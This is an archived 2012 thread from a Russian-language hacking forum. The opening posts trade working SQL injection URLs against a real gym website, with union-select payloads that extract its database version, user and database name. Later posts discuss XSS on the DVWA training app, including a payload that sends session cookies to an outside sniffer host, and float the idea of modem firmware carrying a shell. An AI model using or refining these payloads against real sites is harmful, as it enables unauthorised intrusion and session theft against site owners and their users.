ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.01.2012, 13:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
Code:
http://hydra-gym.com/index2.php?id=63
Код:
Code:
http://hydra-gym.com/index2.php?id=63/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
But when I do id=- or id-null it gives me this error
Код:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 8
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 23
Error: Table 'hydragym.HitCounterRef_1' doesn't exist
|
|
|
|
12.01.2012, 14:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от None
http://hydra-gym.com/index2.php?id=-63+union+select+63,1,1,3,4,5,6,7,8,9,0,version(),6 3,63,63,63,63,63,63,63,63,63--+
Потому что первое значение должно существовать в другой таблице.
|
|
|
|
12.01.2012, 14:22
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Или через ошибку:
http://hydra-gym.com/index2.php?id=-1+union+select+concat(0x01,concat_ws(0x3a,version( ),user(),database())),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+--+
|
|
|
12.01.2012, 19:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
6075
Репутация:
0
|
|
У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо.
Дополнение:
Я поменял с low на medium и когда пишу alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">
|
|
|
|
12.01.2012, 20:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
[QUOTE="NZT"]
NZT said:
У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо.
Дополнение:
Я поменял с low на medium и когда пишу alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">
|
|
|
|
12.01.2012, 20:44
|
|
Новичок
Регистрация: 04.06.2007
Сообщений: 12
Провел на форуме:
580611
Репутация:
38
|
|
возникла такая идея... а нельзя ли сделать прошивку для модемов с шеллом?
ну т.е. если зашел в модем "прошить" и залить шелл ?
|
|
|
|
12.01.2012, 20:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
6075
Репутация:
0
|
|
В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?
Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.
У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?
|
|
|
|
12.01.2012, 21:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от NZT
NZT said:
В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?
Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.
У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?
Тут все ясно, ты сделал , поэтому появились ребенки
По сабжу: XSS medium еще никто не проходил...
UPD. Скачаю-ка себе, тоже покапаюсь...
|
|
|
|
12.01.2012, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
6075
Репутация:
0
|
|
Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли?
Сообщение от None
По сабжу: XSS medium еще никто не проходил...
Если просто в medium вписать скрипт который отсылает куки на снифер то куки не придут , а в low придут , а если после того что я вписал скрипт в low и поменял на medium ничего не стирая то и я захожу в ту гостевую с xss то мне приходят куки от medium. Это о чем то говорит?
И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу)
Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает)
Спасибо за ответы. |
|
|
|
12.01.2012, 21:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от NZT
NZT said:
Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли?
И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу)
Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает)
Спасибо за ответы.
активная это если ты *make some magic* и твои грязные намерения записались куда-то на сайте. и при дальнейших посещениях этой страницы отрабатывает твой скрипт. например при заполнении анкеты где-то в былосоцсети самопальной вместо имени ты написал ">alert('webkill was here') и когда кто-то откроет твою анкету он будет видеть это окно. пассивная это например когда поиск на сайте стоит, принимает параметры в get и выводит на страницу вместе с результатами и сам поисковый запрос. всё же описано в статьях..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
